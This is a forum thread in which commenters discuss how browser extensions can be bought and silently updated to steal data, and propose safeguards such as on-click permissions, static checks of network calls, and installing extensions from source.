Keep in mind, extensions can update themselves at any time, including when they're bought out by someone else. In fact, I bet that's a huge draw... imagine buying an extension that "can read and modify data on all your websites" and then pushing an update that, oh I dunno, exfiltrates everyone's passwords from their gmail. How would most people even catch that?
DO NOT have any extensions running by default except "on click".
There should be at least some kind of static checker of extensions for their calls to fetch or other network APIs. The Web is just too permissive with updating code, you've got eval and much more. It would be great if browsers had only a narrow bottleneck through which code could be updated, and would ask the user first.
(That wouldn't really solve everything since there can be sleeper code that is "switched on" with certain data coming over the wire, but better than what we have now.)
It would be interesting if you could easily install browser extensions via a source repository URL (e.g. GitHub, or any git URL), then at least there would be more transparency about who/what you are trusting by installing it. Blindly trusting a mostly anonymous chrome store "install" button seems insane, since they don't do any significant policing. Wasn't the promise of safety one of the primary reasons Google started the chrome store?
Keep in mind, extensions can update themselves at any time
GP suggested only installing extensions you can build yourself from source. Most extensions that auto update do so via the Chrome store. If you install an extension from source, that won't happen.
EGreg|10 months ago
Keep in mind, extensions can update themselves at any time, including when they're bought out by someone else. In fact, I bet that's a huge draw... imagine buying an extension that "can read and modify data on all your websites" and then pushing an update that, oh I dunno, exfiltrates everyone's passwords from their gmail. How would most people even catch that?
DO NOT have any extensions running by default except "on click".
There should be at least some kind of static checker of extensions for their calls to fetch or other network APIs. The Web is just too permissive with updating code, you've got eval and much more. It would be great if browsers had only a narrow bottleneck through which code could be updated, and would ask the user first.
(That wouldn't really solve everything since there can be sleeper code that is "switched on" with certain data coming over the wire, but better than what we have now.)
metadat|10 months ago
rahimnathwani|10 months ago
arresin|10 months ago
You’d be surprised. It describes all the extensions I use.